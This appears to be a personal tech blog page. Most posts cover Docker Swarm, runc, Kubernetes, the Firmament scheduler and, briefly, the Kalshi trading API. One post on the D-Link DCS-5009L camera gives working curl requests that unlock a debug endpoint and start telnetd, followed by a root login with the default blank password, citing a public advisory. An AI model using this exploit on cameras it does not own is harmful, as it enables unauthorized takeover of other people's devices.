Kalshi Market Mechanics

Recently I’ve been studying the prediction market Kalshi. Kalshi is a CFTC-approved market for binary event contracts. This post is about how the internal mechanics of Kalshi markets work. This understanding is valuable for writing trading bots that access Kalshi through its REST API, or for prediction market enthusiasts who want to peek under the hood.

Event Contracts

What is an event contract? Let’s look at an example. The MOON-25 contract lets you bet on whether NASA will land a manned mission on the moon by 2025. Like in a futures market, you can open a position on either side of the contract: Yes or No. For instance, if you open a Yes position, you’re buying a contract that will pay out $1 if NASA does land on the moon by 2025, and $0 if they do not. So if Yes is trading at 30 cents and the landing happens, each contract you bought pays out $1 for a 70-cent profit; if it doesn’t happen, the contract expires worthless.

The Kalshi Web UI

The Kalshi website offers a rich UI that presents each Kalshi market as a typical two-sided market, with standard bids-and-asks order books for both the Yes and No contracts on the event. If you think NASA will land on the moon, you buy Yes at the current best ask price in the Yes order book. As I’ll show in a moment, that’s not how Kalshi markets work internally, but it’s a good simplification for people who are used to stocks, crypto, and other two-sided markets.

Kalshi Markets Under the Hood

This article is about how Kalshi markets work under the hood. You’ll want to understand this to write trading bots that use Kalshi’s API. (You can experiment with my own trading bot toolkit at github.com/fsctl/go-kalshi).
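As a quick taste of what the REST API gives you, here’s the kind of request a bot makes. (The base URL, path, and field names below are from memory and may be out of date — treat them as assumptions, check Kalshi’s API documentation or the go-kalshi repo for the current ones, and note that some endpoints require authentication.)

$ curl -s "https://trading-api.kalshi.com/trade-api/v2/markets?limit=3" | jq '.markets[] | {ticker, yes_bid, yes_ask}'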



EthCC Paris 2019 Talk


libp2p: latest project for 2018-2019

My current work focuses on enabling Internet decentralization through the open source project libp2p, along with the fine folks at Protocol Labs. Here are a couple of recent presentations I gave on libp2p.

At Protocol Labs’ Lab Day event in SF:

At the Web3 Summit in Berlin:


DockerCon 2016 Keynote

Andrea and I presented Docker 1.12 orchestration on stage at DockerCon this year — in front of 4,000 people! I don’t even think I’ve ever met 4,000 people. It was awesome!


Getting a root telnet prompt on D-Link DCS-5009L IP Camera

My dad thoughtfully sent me a DCS-5009L nanny cam to play around with yesterday. Naturally, the first thing I wanted to do was get to a root shell on the device. I quickly came across this security advisory from Tao Sauvage at IOActive. Thanks, Tao!

tl;dr: plug in the camera, figure out its IP address, and start telnetd like this:

$ curl --data 'ReplySuccessPage=advanced.htm&ReplyErrorPage=errradv.htm&WebDebugLevel=0&WebFuncLevel=1180250000' -X POST http://admin@[CAMERA_IP]/setDebugLevel
$ curl --data 'ReplySuccessPage=home.htm&ReplyErrorPage=errradv.htm&SystemCommand=telnetd&ConfigSystemCommand=test' -X POST http://admin@[CAMERA_IP]/setSystemCommand
$ telnet [CAMERA_IP]
Trying 10.0.1.173...
Connected to 10.0.1.173.
Escape character is '^]'.

(none) login: admin
Password: [leave blank]


BusyBox v1.12.1 (2014-09-03 17:28:29 CST) built-in shell (ash)
Enter 'help' for a list of built-in commands.

# 

The default username is admin and the password is empty.

Per Tao’s security advisory: in the first curl, 1180250000 is a magic constant that puts the device into a debugging mode where the /setSystemCommand HTTP endpoint becomes available. In the second curl, we use that endpoint to run telnetd.


Docker Swarm 1.0 with Multi-host Networking: Manual Setup

Jeff Nickoloff had a great Medium post recently about how to set up a Swarm 1.0 cluster using the multi-host networking features added in Docker 1.9. He uses Docker Machine’s built-in Swarm support to create a demonstration cluster in just a few minutes.

In this post, I’ll show how to recreate the same cluster manually — that is, without docker-machine provisioning. This is for advanced users who want to understand what Machine is doing under the hood.

First, let’s take a look at the layout of the cluster Jeff created in his post. There are four machines:


Topology of our Swarm cluster.

To approximate the provisioning that Machine is doing under the hood, we’ll use this Vagrantfile to provision four Ubuntu boxes:

Name        IP              Description
kv2         192.168.33.10   Consul (for both cluster discovery and networking)
c0-master   192.168.33.11   Swarm master
c0-n1       192.168.33.12   Swarm node 1
c0-n2       192.168.33.13   Swarm node 2

In the directory where you saved the Vagrantfile, run vagrant up. This will take 5-10 minutes, but at the end of the process you should have four VMs running Docker 1.9 or higher. Note how our Vagrantfile starts each instance of Docker Engine (the docker daemon) with --cluster-store=consul://192.168.33.10:8500 and --cluster-advertise=eth1:2375. Those flags are the same ones Jeff passes to docker-machine using --engine-opt.
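If you’re curious what that provisioning boils down to on each Ubuntu box, it’s roughly the following (a sketch; the actual Vagrantfile may perform the equivalent steps differently):

$ echo 'DOCKER_OPTS="--cluster-store=consul://192.168.33.10:8500 --cluster-advertise=eth1:2375"' | sudo tee -a /etc/default/docker
$ sudo service docker restart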

Because Docker’s multi-host (overlay) networking requires a 3.16 or newer kernel, we need one manual step on each machine to upgrade its kernel. Run these commands from your host shell prompt:

$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" kv2
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-master
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n1
$ vagrant ssh -c "sudo apt-get install -y linux-image-generic-lts-utopic && sudo reboot" c0-n2

(Jeff doesn’t have to do this in his tutorial because Machine provisions using an ISO that contains a recent kernel.)

We’re now ready to set up a Consul key/value store just as Jeff did:

$ docker -H=tcp://192.168.33.10:2375 run -d -p 8500:8500 -h consul progrium/consul -server -bootstrap

Here’s how you manually start the swarm manager on the c0-master machine:

$ docker -H=tcp://192.168.33.11:2375 run -d -p 3375:2375 swarm manage consul://192.168.33.10:8500/

Next we start two swarm agent containers on nodes c0-n1 and c0-n2:

$ docker -H=tcp://192.168.33.12:2375 run -d swarm join --advertise=192.168.33.12:2375 consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.13:2375 run -d swarm join --advertise=192.168.33.13:2375 consul://192.168.33.10:8500/

Let’s test the cluster:

$ docker -H=tcp://192.168.33.11:3375 info
$ docker -H=tcp://192.168.33.11:3375 run swarm list consul://192.168.33.10:8500/
$ docker -H=tcp://192.168.33.11:3375 run hello-world

Create the overlay network just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 network create -d overlay myStack1
$ docker -H=tcp://192.168.33.11:3375 network ls

Create the same two (nginx and alpine) containers that Jeff did:

$ docker -H=tcp://192.168.33.11:3375 run -d --name web --net myStack1 nginx
$ docker -H=tcp://192.168.33.11:3375 run -itd --name shell1 --net myStack1 alpine /bin/sh

And verify they can talk to each other just as Jeff did:

$ docker -H=tcp://192.168.33.11:3375 attach shell1
$ ping web
$ apk update && apk add curl
$ curl http://web/

You should find that shell1 is able to ping the nginx container, and vice-versa, just as was the case in Jeff’s tutorial.


What is the Firmament scheduler?

Some in the Kubernetes community are considering adopting a new scheduler based on Malte Schwarzkopf’s Firmament cluster scheduler. I just finished reading Ch. 5 of Malte’s thesis. Here’s a high-level summary of what Firmament is about.

Today’s container orchestration systems like Kubernetes, Mesos, Diego and Docker Swarm rely heavily on straightforward heuristics for scheduling. This works well if you want to optimize along a single dimension, like efficient bin packing of workloads to servers. But these heuristics are not designed to simultaneously handle complex tradeoffs between competing priorities like data locality, scheduling delay, soft and hard affinity constraints, inter-task dependency constraints, etc. Taking so many factors into account at once is difficult.

The Firmament scheduler tries to optimize across many tradeoffs, while still making fast scheduling decisions. How? Like Microsoft’s Quincy scheduler, it considers things from a new angle: cost. Suppose we assign a cost to every scheduling tradeoff. The problem of efficient scheduling then becomes a global cost minimization problem, which is much more tractable than trying to design a heuristic that balances many different factors.

Firmament’s technical implementation is to model the scheduling problem as a flow graph. Workloads are the flow sources, and they flow into the cluster, whose topology of machines and availability zones is modeled by vertices in the graph. Ultimately, all workloads arrive at a global sink, having either flowed through a machine on which they were scheduled or having remained unscheduled. Which path each workload takes is decided by cost.

Here’s a simplified diagram I created, based on Firmament’s diagram (itself a simpler version of Quincy’s Fig. 4):


Simplified example of Firmament’s flow graph structure. By assigning costs to each edge, global cost minimization can be performed. For example, each of the three workloads may be scheduled on the cluster or remain unscheduled, depending on the relative costs of their immediate execution vs. delay.
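Stated as the standard min-cost flow objective (the same formulation Quincy introduced and Firmament builds on), the solver looks for the flow f over the edge set E that achieves

\min_{f} \sum_{e \in E} \mathrm{cost}(e) \cdot f(e)

subject to the usual edge-capacity and flow-conservation constraints. The arcs each unit of flow ends up traversing tell you whether its workload was scheduled, and on which machine.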

But how are these costs determined? That’s the coolest part of Firmament: it supports pluggable cost models through a cost model API. Firmament provides several performance-based cost models as well as an interesting one that seeks to minimize data center electricity consumption. Of course, users can supply their own cost models through the API.



Docker runc

I had some time recently to start playing around with Docker’s new runc / OpenContainers work. This is basically the old libcontainer, but now it’s governed by an industry consortium under the Linux Foundation. So, Docker and CoreOS are now friends, or at least frenemies, which is very exciting.

The README over on runc doesn’t fully explain how to get runc to work, i.e., to run a simple example container. They provide a nice example container.json file, but it comes without a rootfs, which is confusing if you’re just getting started. I posted a github issue comment about how to make their container.json work.

Here are the full steps to get the runc sample working:

1.  Build the runc binary if you haven’t already:

mkdir -p $GOPATH/src/github.com/opencontainers
cd $GOPATH/src/github.com/opencontainers
git clone https://github.com/opencontainers/runc
cd runc
make

2.  Grab their container.json from this section of the runc readme:  opencontainers/runc#ocf-container-json-format

3.  Build a rootfs. The easiest way to do this is to docker export the filesystem of an existing container:

docker run -it ubuntu bash

Now exit immediately (Ctrl+D).

docker ps -a # to find the container ID of the ubuntu container you just exited
docker export [container ID] > docker-ubuntu.tar

Then untar docker-ubuntu.tar into a directory called rootfs, which should be in the same parent directory as your container.json. You now have a rootfs that will work with the container.json linked above. Type sudo runc and you’ll be at an sh prompt, inside your container.
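Concretely, from the directory that contains container.json:

mkdir rootfs
tar -C rootfs -xf docker-ubuntu.tar   # unpack the exported ubuntu filesystem
sudo runc                             # drops you at an sh prompt inside the container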


Kubernetes Concepts

Once you have a Kubernetes cluster up and running, there are three key abstractions to understand: pods, services and replication controllers.

Pods. A pod — as in a pod of whales (whale metaphors are very popular in this space) — is a group of containers scheduled on the same host. They are tightly coupled because they are all part of the same application and would have run on the same host in the old days. Each container in a pod shares the same network, IPC, and PID namespaces. Of course, since Docker doesn’t support shared PID namespaces (every Docker container’s main process is PID 1 of its own hierarchy, and there’s no way to merge two running containers), a pod right now is really just a group of Docker containers running on the same host with shared Kubernetes volumes (as distinct from Docker volumes).
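You can see the network-namespace sharing with plain Docker. This isn’t literally what Kubernetes runs under the hood, just a sketch of the same --net=container: joining that pod networking is built on:

docker run -d --name web-in-pod nginx
docker run -it --net=container:web-in-pod alpine /bin/sh
# inside the alpine shell, nginx answers on localhost because both containers share one network namespace:
wget -qO- http://localhost/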

Pods are a low-level primitive. Users do not normally create them directly; instead, replication controllers are responsible for creating pods (see below).

You can view pods like this:

kubectl.sh get pods

Read more about pods in the Kubernetes documentation: Kubernetes Pods

Replication Controllers. Pods, like the containers within them, are ephemeral. They do not survive node failure or reboots. Instead, replication controllers are used to keep a certain number of pod replicas running at all times, starting new pod replicas when more are needed. Thus, replication controllers are longer-lived than pods and can be thought of as a management abstraction sitting atop the pod concept.

You can view replication controllers like this:

kubectl.sh get replicationControllers

Read more about replication controllers in the Kubernetes documentation: Replication Controllers in Kubernetes.

Services. Services are an abstraction that groups together multiple pods to provide a service. (The term “service” here is used in the microservices architecture sense.) The example in the Kubernetes documentation is that of an image-processing backend, which may consist of several pod replicas. These replicas, grouped together, represent the image processing microservice within your larger application.

A service is longer lived than a replication controller, and a service may create or destroy many replication controllers during its life. Just as replication controllers are a management abstraction sitting atop the pods abstraction, services can be thought of as a control abstraction that sits atop multiple replication controllers.

You can view services like this:

kubectl.sh get services

Read more about services in the Kubernetes documentation: Kubernetes Services.
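To make the relationship concrete, here is a minimal sketch (the image-proc name and image are hypothetical, and it assumes your cluster serves the v1 API) of a replication controller plus a service that selects its pods:

cat > image-proc-rc.yaml <<'EOF'
apiVersion: v1
kind: ReplicationController
metadata:
  name: image-proc
spec:
  replicas: 3
  selector:
    app: image-proc
  template:
    metadata:
      labels:
        app: image-proc
    spec:
      containers:
      - name: image-proc
        image: my-image-proc:latest
EOF

cat > image-proc-svc.yaml <<'EOF'
apiVersion: v1
kind: Service
metadata:
  name: image-proc
spec:
  selector:
    app: image-proc
  ports:
  - port: 80
EOF

kubectl.sh create -f image-proc-rc.yaml
kubectl.sh create -f image-proc-svc.yaml

The service’s selector (app: image-proc) is what ties it to whichever pods the replication controller happens to be maintaining at any moment.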

Source / Further Reading: Design of Kubernetes


Techniques for Exploring Docker Containers

The preferred method of poking around inside a running Docker container is nsenter. Docker has a nice tutorial.

But what if your container doesn’t have an executable shell like /bin/sh? Then you can’t enter it with nsenter or docker exec. Here are a few tricks you can use to learn about it anyway.

docker inspect -f '{{.Config.Env}}' [container ID] – will show you the environment variables set in the container

docker export [container ID] | tar -tvf - – to list the filesystem inside the container (thanks to cnf on #docker-dev for teaching me this one)

docker export [container ID] | tar -xvf - – run this from a temp directory to extract the entire container filesystem and examine it in more detail

I’ll add more tricks here in the future.

